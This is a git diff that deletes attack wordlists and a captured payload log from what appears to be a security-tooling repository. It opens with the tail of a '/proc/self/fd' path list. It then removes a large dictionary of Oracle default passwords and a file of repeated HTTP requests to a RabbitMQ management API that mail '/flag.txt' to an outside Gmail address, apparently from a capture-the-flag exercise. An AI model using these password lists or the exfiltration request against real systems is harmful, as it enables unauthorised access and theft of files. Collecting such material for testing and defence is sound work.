-/proc/self/fd/44
-/proc/self/fd/45
-/proc/self/fd/46
-/proc/self/fd/47
-/proc/self/fd/48
-/proc/self/fd/49
-/proc/self/fd/50
-/proc/self/fd/51
-/proc/self/fd/52
-/proc/self/fd/53
-/proc/self/fd/54
-/proc/self/fd/55
-/proc/self/fd/56
-/proc/self/fd/57
-/proc/self/fd/58
-/proc/self/fd/59
-/proc/self/fd/60
-/proc/self/fd/61
-/proc/self/fd/62
-/proc/self/fd/63
-/proc/self/fd/64
-/proc/self/fd/65
-/proc/self/fd/66
-/proc/self/fd/67
-/proc/self/fd/68
-/proc/self/fd/69
-/proc/self/fd/70
-/proc/self/fd/71
-/proc/self/fd/72
-/proc/self/fd/73
-/proc/self/fd/74
-/proc/self/fd/75
-/proc/self/fd/76
-/proc/self/fd/77
-/proc/self/fd/78
-/proc/self/fd/79
-/proc/self/fd/80
-/proc/self/fd/81
-/proc/self/fd/82
-/proc/self/fd/83
-/proc/self/fd/84
-/proc/self/fd/85
-/proc/self/fd/86
-/proc/self/fd/87
-/proc/self/fd/88
-/proc/self/fd/89
-/proc/self/fd/90
-/proc/self/fd/91
-/proc/self/fd/92
-/proc/self/fd/93
-/proc/self/fd/94
-/proc/self/fd/95
-/proc/self/fd/96
-/proc/self/fd/97
-/proc/self/fd/98
-/proc/self/fd/99
-/proc/self/fd/100
diff --git a/src/images/pass-oracle.txt b/src/images/pass-oracle.txt
deleted file mode 100644
index 5c42de326..000000000
--- a/src/images/pass-oracle.txt
+++ /dev/null
@@ -1,1402 +0,0 @@
-06071992
-0racl3
-0RACL3
-0racl38
-0RACL38
-0racl38i
-0RACL38I
-0racl39
-0RACL39
-0racl39i
-0RACL39I
-0racle
-0RACLE
-0racle8
-0RACLE8
-0racle8i
-0RACLE8I
-0racle9
-0RACLE9
-0racle9i
-0RACLE9I
-199220706
-AASH
-ABA1
-abm
-ABM
-adgangskode
-ADGANGSKODE
-adldemo
-ADLDEMO
-admin
-ADMIN
-administrator
-ADMINISTRATOR
-ADS
-ahl
-AHL
-ahm
-AHM
-airoplane
-AIROPLANE
-ak
-AK
-akf7d98s2
-AKF7D98S2
-AL
-ALA1
-ALLUSERS
-alr
-ALR
-AMA1
-AMA2
-AMA3
-AMA4
-AMF
-ams
-AMS
-AMS1
-AMS2
-AMS3
-AMS4
-AMSYS
-amv
-AMV
-AMW
-ANNE
-anonymous
-ANONYMOUS
-AOLDEMO
-ap
-AP
-APA1
-APA2
-APA3
-APA4
-APPLEAD
-applmgr
-APPLMGR
-applsys
-APPLSYS
-applsyspub
-APPLSYSPUB
-apppassword
-APPPASSWORD
-apps
-APPS
-APS1
-APS2
-APS3
-APS4
-aq
-AQ
-aqdemo
-AQDEMO
-aqjava
-AQJAVA
-aquser
-AQUSER
-ar
-AR
-ARA1
-ARA2
-ARA3
-ARA4
-ARS1
-ARS2
-ARS3
-ARS4
-ART
-asf
-ASF
-asg
-ASG
-asl
-ASL
-ASN
-aso
-ASO
-asp
-ASP
-ast
-AST
-AUC_GUEST
-audiouser
-AUDIOUSER
-AUTHORIA
-ax
-AX
-az
-AZ
-B2B
-BAM
-bar
-BAR
-bc4j
-BC4J
-BCA1
-BCA2
-ben
-BEN
-bic
-BIC
-bil
-BIL
-bim
-BIM
-bis
-BIS
-biv
-BIV
-bix
-BIX
-blewis
-BLEWIS
-BMEADOWS
-BNE
-bom
-BOM
-BP01
-BP02
-BP03
-BP04
-BP05
-BP06
-brio_admin
-BRIO_ADMIN
-bsc
-BSC
-bug_reports
-BUG_REPORTS
-BUYACCT
-BUYAPPR1
-BUYAPPR2
-BUYAPPR3
-BUYER
-BUYMTCH
-CAMRON
-CANDICE
-CARL
-CARLY
-CARMEN
-CARRIECONYERS
-CATADMIN
-catalog
-CATALOG
-cct
-CCT
-cdemo82
-CDEMO82
-cdemo83
-CDEMO83
-cdemocor
-CDEMOCOR
-cdemorid
-CDEMORID
-cdemoucb
-CDEMOUCB
-cdouglas
-CDOUGLAS
-ce
-CE
-CEASAR
-centra
-CENTRA
-central
-CENTRAL
-CFD
-CHANDRA
-change_on_install
-CHANGE_ON_INSTALL
-CHARLEY
-CHRISBAKER
-CHRISTIE
-cids
-CIDS
-CINDY
-cis
-CIS
-cisinfo
-CISINFO
-CLARK
-CLAUDE
-clave
-CLAVE
-clerk
-CLERK
-CLINT
-CLN
-cloth
-CLOTH
-cn
-CN
-CNCADMIN
-company
-COMPANY
-compiere
-COMPIERE
-CONNIE
-CONNOR
-CORY
-CRM1
-CRM2
-crp
-CRP
-CRPB733
-CRPCTL
-CRPDTA
-cs
-CS
-CSADMIN
-CSAPPR1
-csc
-CSC
-csd
-CSD
-CSDUMMY
-cse
-CSE
-csf
-CSF
-csi
-CSI
-csl
-CSL
-CSM
-csmig
-CSMIG
-csp
-CSP
-csr
-CSR
-css
-CSS
-ctxdemo
-CTXDEMO
-ctxsys
-CTXSYS
-CTXTEST
-cua
-CUA
-cue
-CUE
-cuf
-CUF
-cug
-CUG
-cui
-CUI
-cun
-CUN
-cup
-CUP
-cus
-CUS
-cz
-CZ
-DAVIDMORGAN
-dbsnmp
-DBSNMP
-dbvision
-DBVISION
-DCM
-DD7333
-DD7334
-DD810
-DD811
-DD812
-DD9
-DDB733
-DDD
-demo
-DEMO
-demo8
-DEMO8
-demo9
-DEMO9
-des
-DES
-des2k
-DES2K
-dev2000_demos
-DEV2000_DEMOS
-DEVB733
-DEVUSER
-dip
-DIP
-DISCOVERER5
-discoverer_admin
-DISCOVERER_ADMIN
-DKING
-DLD
-DMATS
-DMS
-dmsys
-DMSYS
-DOM
-dpfpass
-DPFPASS
-DPOND
-dsgateway
-DSGATEWAY
-dssys
-DSSYS
-d_syspw
-D_SYSPW
-d_systpw
-D_SYSTPW
-dtsp
-DTSP
-DV7333
-DV7334
-DV810
-DV811
-DV812
-DV9
-DVP1
-eaa
-EAA
-eam
-EAM
-east
-EAST
-ec
-EC
-ecx
-ECX
-EDR
-EDWEUL_US
-EDWREP
-EGC1
-EGD1
-EGM1
-EGO
-EGR1
-ejb
-EJB
-ejsadmin
-EJSADMIN
-ejsadmin_password
-EJSADMIN_PASSWORD
-emp
-EMP
-END1
-eng
-ENG
-eni
-ENI
-ENM1
-ENS1
-ENTMGR_CUST
-ENTMGR_PRO
-ENTMGR_TRAIN
-EOPP_PORTALADM
-EOPP_PORTALMGR
-EOPP_USER
-estore
-ESTORE
-EUL_US
-event
-EVENT
-evm
-EVM
-EXA1
-EXA2
-EXA3
-EXA4
-example
-EXAMPLE
-exfsys
-EXFSYS
-EXS1
-EXS2
-EXS3
-EXS4
-extdemo
-EXTDEMO
-extdemo2
-EXTDEMO2
-fa
-FA
-fem
-FEM
-FIA1
-fii
-FII
-finance
-FINANCE
-finprod
-FINPROD
-flm
-FLM
-fnd
-FND
-fndpub
-FNDPUB
-FNI1
-FNI2
-FPA
-fpt
-FPT
-frm
-FRM
-FTA1
-fte
-FTE
-FUN
-fv
-FV
-FVP1
-GALLEN
-GCA1
-GCA2
-GCA3
-GCA9
-GCMGR1
-GCMGR2
-GCMGR3
-GCS
-GCS1
-GCS2
-GCS3
-GEORGIAWINE
-gl
-GL
-GLA1
-GLA2
-GLA3
-GLA4
-GLS1
-GLS2
-GLS3
-GLS4
-gma
-GMA
-GM_AWDA
-GM_COPI
-gmd
-GMD
-GM_DPHD
-gme
-GME
-gmf
-GMF
-gmi
-GMI
-gml
-GML
-GM_MLCT
-gmp
-GMP
-GM_PLADMA
-GM_PLADMH
-GM_PLCCA
-GM_PLCCH
-GM_PLCOMA
-GM_PLCOMH
-GM_PLCONA
-GM_PLCONH
-GM_PLNSCA
-GM_PLNSCH
-GM_PLSCTA
-GM_PLSCTH
-GM_PLVET
-gms
-GMS
-GM_SPO
-GM_STKH
-gpfd
-GPFD
-gpld
-GPLD
-gr
-GR
-GUEST
-hades
-HADES
-HCC
-hcpark
-HCPARK
-HHCFO
-hlw
-HLW
-hobbes
-HOBBES
-hr
-HR
-hri
-HRI
-hvst
-HVST
-hxc
-HXC
-hxt
-HXT
-IA
-iba
-IBA
-IBC
-ibe
-IBE
-ibp
-IBP
-ibu
-IBU
-iby
-IBY
-icdbown
-ICDBOWN
-icx
-ICX
-idemo_user
-IDEMO_USER
-ieb
-IEB
-iec
-IEC
-iem
-IEM
-ieo
-IEO
-ies
-IES
-ieu
-IEU
-iex
-IEX
-ifssys
-IFSSYS
-igc
-IGC
-igf
-IGF
-igi
-IGI
-igs
-IGS
-igw
-IGW
-imageuser
-IMAGEUSER
-imc
-IMC
-imedia
-IMEDIA
-imt
-IMT
-INS1
-INS2
-instance
-INSTANCE
-inv
-INV
-invalid
-INVALID
-Invalid password
-IP
-ipa
-IPA
-ipd
-IPD
-iplanet
-IPLANET
-isc
-ISC
-ISTEWARD
-itg
-ITG
-ja
-JA
-JD7333
-JD7334
-JD9
-JDE
-JDEDBA
-je
-JE
-jetspeed
-JETSPEED
-jg
-JG
-jl
-JL
-JL
-jmuser
-JMUSER
-john
-JOHN
-JOHNINARI
-jtf
-JTF
-JTI
-jtm
-JTM
-JTR
-jts
-JTS
-JUNK_PS
-JUSTOSHUM
-KELLYJONES
-KEVINDONS
-KPN
-kwalker
-KWALKER
-l2ldemo
-L2LDEMO
-LADAMS
-laskjdf098ksdaf09
-LASKJDF098KSDAF09
-LBA
-lbacsys
-LBACSYS
-LDQUAL
-LHILL
-LIZARD
-LNS
-LQUINCY
-LSA
-manag3r
-MANAG3R
-manager
-MANAGER
-manprod
-MANPROD
-mddata
-MDDATA
-mddemo
-MDDEMO
-mddemo_mgr
-MDDEMO_MGR
-mdsys
-MDSYS
-me
-ME
-mfg
-MFG
-mgr
-MGR
-MGR1
-MGR2
-MGR3
-MGR4
-mgwuser
-MGWUSER
-migrate
-MIGRATE
-MIKEIKEGAMI
-miller
-MILLER
-MJONES
-MLAKE
-MM1
-MM2
-MM3
-MM4
-MM5
-MMARTIN
-mmo2
-MMO2
-mmo3
-MMO3
-moreau
-MOREAU
-mot_de_passe
-MOT_DE_PASSE
-mrp
-MRP
-msc
-MSC
-msd
-MSD
-mso
-MSO
-msr
-MSR
-MST
-mt6ch5
-MT6CH5
-mtrpw
-MTRPW
-mts_password
-MTS_PASSWORD
-mtssys
-MTSSYS
-mumblefratz
-MUMBLEFRATZ
-mwa
-MWA
-mxagent
-MXAGENT
-names
-NAMES
-NEILKATSU
-neotix_sys
-NEOTIX_SYS
-nneulpass
-NNEULPASS
-oas_public
-OAS_PUBLIC
-OBJ7333
-OBJ7334
-OBJB733
-OCA
-ocitest
-OCITEST
-ocm_db_admin
-OCM_DB_ADMIN
-odm
-ODM
-ods
-ODS
-odscommon
-ODSCOMMON
-ods_server
-ODS_SERVER
-oe
-OE
-oemadm
-OEMADM
-oemrep
-OEMREP
-oem_temp
-OEM_TEMP
-okb
-OKB
-okc
-OKC
-oke
-OKE
-oki
-OKI
-OKL
-oko
-OKO
-okr
-OKR
-oks
-OKS
-okx
-OKX
-OL810
-OL811
-OL812
-OL9
-olapdba
-OLAPDBA
-olapsvr
-OLAPSVR
-olapsys
-OLAPSYS
-ont
-ONT
-oo
-OO
-openspirit
-OPENSPIRIT
-opi
-OPI
-ORABAM
-ORABAMSAMPLES
-ORABPEL
-oracache
-ORACACHE
-oracl3
-ORACL3
-oracle
-ORACLE
-oracle8
-ORACLE8
-oracle8i
-ORACLE8I
-oracle9
-ORACLE9
-oracle9i
-ORACLE9I
-oradbapass
-ORADBAPASS
-ORAESB
-ORAOCA_PUBLIC
-oraprobe
-ORAPROBE
-oraregsys
-ORAREGSYS
-ORASAGENT
-orasso
-ORASSO
-orasso_ds
-ORASSO_DS
-orasso_pa
-ORASSO_PA
-orasso_ps
-ORASSO_PS
-orasso_public
-ORASSO_PUBLIC
-orastat
-ORASTAT
-ordcommon
-ORDCOMMON
-ordplugins
-ORDPLUGINS
-ordsys
-ORDSYS
-osm
-OSM
-osp22
-OSP22
-ota
-OTA
-outln
-OUTLN
-owa
-OWA
-OWAPUB
-owa_public
-OWA_PUBLIC
-owf_mgr
-OWF_MGR
-owner
-OWNER
-ozf
-OZF
-ozp
-OZP
-ozs
-OZS
-pa
-PA
-PABLO
-PAIGE
-PAM
-panama
-PANAMA
-paper
-PAPER
-parol
-PAROL
-PARRISH
-PARSON
-passwd
-PASSWD
-passwo1
-PASSWO1
-passwo2
-PASSWO2
-passwo3
-PASSWO3
-passwo4
-PASSWO4
-password
-PASSWORD
-PAT
-PATORILY
-PATRICKSANCHEZ
-patrol
-PATROL
-PATSY
-paul
-PAUL
-PAULA
-PAXTON
-PCA1
-PCA2
-PCA3
-PCA4
-PCS1
-PCS2
-PCS3
-PCS4
-PD7333
-PD7334
-PD810
-PD811
-PD812
-PD9
-PDA1
-PEARL
-PEG
-PENNY
-PEOP1E
-PERCY
-perfstat
-PERFSTAT
-PERRY
-perstat
-PERSTAT
-PETE
-PEYTON
-PHIL
-PJI
-pjm
-PJM
-planning
-PLANNING
-plex
-PLEX
-pm
-PM
-pmi
-PMI
-pn
-PN
-po
-PO
-po7
-PO7
-po8
-PO8
-poa
-POA
-POLLY
-pom
-POM
-PON
-PORTAL
-portal30
-PORTAL30
-portal30_admin
-PORTAL30_ADMIN
-portal30_demo
-PORTAL30_DEMO
-portal30_ps
-PORTAL30_PS
-portal30_public
-PORTAL30_PUBLIC
-portal30_sso
-PORTAL30_SSO
-portal30_sso_admin
-PORTAL30_SSO_ADMIN
-portal30_sso_ps
-PORTAL30_SSO_PS
-portal30_sso_public
-PORTAL30_SSO_PUBLIC
-portal31
-PORTAL31
-PORTAL_APP
-portal_demo
-PORTAL_DEMO
-PORTAL_PUBLIC
-portal_sso_ps
-PORTAL_SSO_PS
-pos
-POS
-powercartuser
-POWERCARTUSER
-PPM1
-PPM2
-PPM3
-PPM4
-PPM5
-primary
-PRIMARY
-PRISTB733
-PRISTCTL
-PRISTDTA
-PRODB733
-PRODCTL
-PRODDTA
-PRODUSER
-PRP
-PS
-PS810
-PS810CTL
-PS810DTA
-PS811
-PS811CTL
-PS811DTA
-PS812
-PS812CTL
-PS812DTA
-psa
-PSA
-psb
-PSB
-PSBASS
-PSEM
-PSFT
-PSFTDBA
-psp
-PSP
-PTADMIN
-PTCNE
-PTDMO
-PTE
-PTESP
-PTFRA
-PTG
-PTGER
-PTJPN
-PTUKE
-PTUPG
-PTWEB
-PTWEBSERVER
-pub
-PUB
-pubsub
-PUBSUB
-pubsub1
-PUBSUB1
-pv
-PV
-PY7333
-PY7334
-PY810
-PY811
-PY812
-PY9
-qa
-QA
-qdba
-QDBA
-QOT
-qp
-QP
-QRM
-qs
-QS
-qs_adm
-QS_ADM
-qs_cb
-QS_CB
-qs_cbadm
-QS_CBADM
-qs_cs
-QS_CS
-qs_es
-QS_ES
-qs_os
-QS_OS
-qs_ws
-QS_WS
-re
-RE
-RENE
-repadmin
-REPADMIN
-reports
-REPORTS
-rep_owner
-REP_OWNER
-RESTRICTED_US
-rg
-RG
-rhx
-RHX
-rla
-RLA
-rlm
-RLM
-RM1
-RM2
-RM3
-RM4
-RM5
-rmail
-RMAIL
-rman
-RMAN
-ROB
-RPARKER
-rrs
-RRS
-RWA1
-SALLYH
-SAM
-sample
-SAMPLE
-sampleatm
-SAMPLEATM
-sap
-SAP
-sapr3
-SAPR3
-SARAHMANDY
-SCM1
-SCM2
-SCM3
-SCM4
-SDAVIS
-sdos_icsap
-SDOS_ICSAP
-secdemo
-SECDEMO
-SEDWARDS
-SELLCM
-SELLER
-SELLTREAS
-senha
-SENHA
-serviceconsumer1
-SERVICECONSUMER1
-SETUP
-sh
-SH
-shelves
-SHELVES
-SID
-si_informtn_schema
-SI_INFORMTN_SCHEMA
-siteminder
-SITEMINDER
-SKAYE
-SKYTETSUKA
-slidepw
-SLIDEPW
-SLSAA
-SLSMGR
-SLSREP
-snowman
-SNOWMAN
-spierson
-SPIERSON
-SRABBITT
-SRALPHS
-SRAY
-SRIVERS
-SSA1
-SSA2
-SSA3
-SSC1
-SSC2
-SSC3
-SSOSDK
-ssp
-SSP
-SSS1
-starter
-STARTER
-steel
-STEEL
-strat_passwd
-STRAT_PASSWD
-supersecret
-SUPERSECRET
-SUPPLIER
-support
-SUPPORT
-SVM7333
-SVM7334
-SVM810
-SVM811
-SVM812
-SVM9
-SVMB733
-SVP1
-swordfish
-SWORDFISH
-swpro
-SWPRO
-swuser
-SWUSER
-SY810
-SY811
-SY812
-SY9
-sympa
-SYMPA
-sys
-SYS
-SYS7333
-SYS7334
-sysadm
-SYSADM
-sysadmin
-SYSADMIN
-SYSB733
-sysman
-SYSMAN
-syspass
-SYSPASS
-sys_stnt
-SYS_STNT
-system
-SYSTEM
-systempass
-SYSTEMPASS
-tahiti
-TAHITI
-TDEMARCO
-tdos_icsap
-TDOS_ICSAP
-tectec
-TECTEC
-test
-TEST
-TESTCTL
-TESTDTA
-testpilot
-TESTPILOT
-test_user
-TEST_USER
-thinsamplepw
-THINSAMPLEPW
-tibco
-TIBCO
-tiger
-TIGER
-tigger
-TIGGER
-tip37
-TIP37
-TRA1
-trace
-TRACE
-travel
-TRAVEL
-TRBM1
-TRCM1
-TRDM1
-TRRM1
-tsdev
-TSDEV
-tsuser
-TSUSER
-turbine
-TURBINE
-TWILLIAMS
-UDDISYS
-ultimate
-ULTIMATE
-um_admin
-UM_ADMIN
-um_client
-UM_CLIENT
-unknown
-UNKNOWN
-user
-USER
-user0
-USER0
-user1
-USER1
-user2
-USER2
-user3
-USER3
-user4
-USER4
-user5
-USER5
-user6
-USER6
-user7
-USER7
-user8
-USER8
-user9
-USER9
-utility
-UTILITY
-utlestat
-UTLESTAT
-vea
-VEA
-veh
-VEH
-vertex_login
-VERTEX_LOGIN
-VIDEO31
-VIDEO4
-VIDEO5
-videouser
-VIDEOUSER
-vif_dev_pwd
-VIF_DEV_PWD
-viruser
-VIRUSER
-VP1
-VP2
-VP3
-VP4
-VP5
-VP6
-vrr1
-VRR1
-vrr2
-VRR2
-WAA1
-WAA2
-WCRSYS
-webcal01
-WEBCAL01
-webdb
-WEBDB
-webread
-WEBREAD
-welcome
-WELCOME
-WELCOME1
-WENDYCHO
-west
-WEST
-wfadmin
-WFADMIN
-wh
-WH
-wip
-WIP
-WIRELESS
-wkadmin
-WKADMIN
-wkproxy
-WKPROXY
-wksys
-WKSYS
-wk_test
-WK_TEST
-wkuser
-WKUSER
-wms
-WMS
-wmsys
-WMSYS
-wob
-WOB
-wood
-WOOD
-wps
-WPS
-wsh
-WSH
-wsm
-WSM
-www
-WWW
-wwwuser
-WWWUSER
-xademo
-XADEMO
-XDO
-xdp
-XDP
-xla
-XLA
-XLE
-XNB
-xnc
-XNC
-xni
-XNI
-xnm
-XNM
-xnp
-XNP
-xns
-XNS
-xprt
-XPRT
-xtr
-XTR
-xxx
-XXX
-YCAMPOS
-yes
-YES
-your_pass
-YOUR_PASS
-YSANCHEZ
-ZFA
-ZPB
-ZSA
-zwerg
-ZWERG
-ZX
diff --git a/src/images/posts (1).txt b/src/images/posts (1).txt
deleted file mode 100644
index c64dc9f52..000000000
--- a/src/images/posts (1).txt
+++ /dev/null
@@ -1,7703 +0,0 @@
-‰PNG
-POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
